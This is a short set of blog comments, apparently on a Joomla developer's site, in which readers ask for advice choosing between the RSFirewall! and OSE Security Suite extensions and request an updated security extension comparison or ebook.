I'm planning to put one secure extension in my online store website. I don't know which one should I choose between RSFirewall! and Security Suite by OSE. In Security Suite, they wrote can perform advanced protection in Joomla!, VirtueMart, Magento, Drupal and WordPress, etc. Inside this link (http://www.opensource-excellence.com/shop/item/389-ose-security-suite.html ) under performance tab, I saw they already checked all security leak based on "2010 Joomla! Security Extension Comparison". I wish you can make "2012 Joomla Security Extension Comparison". Thank you and appreciate for your effort. :)

Sincerely,
NgeNge
15 Tuesday, 20 August 2013 09:00
Please reconsider!
2013 review Please! or perhaps a paid ebook on security

What's worse than no-wit is half-wit - a common occurrence with many devs, hosts, project managers etc. We need a security authority figure to set a high standard.

No more half-witted know-it-alls

C'mon Jeff, you, Nick D, BrianT, Tom C, couple more and we'll have a security brain trust!


The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
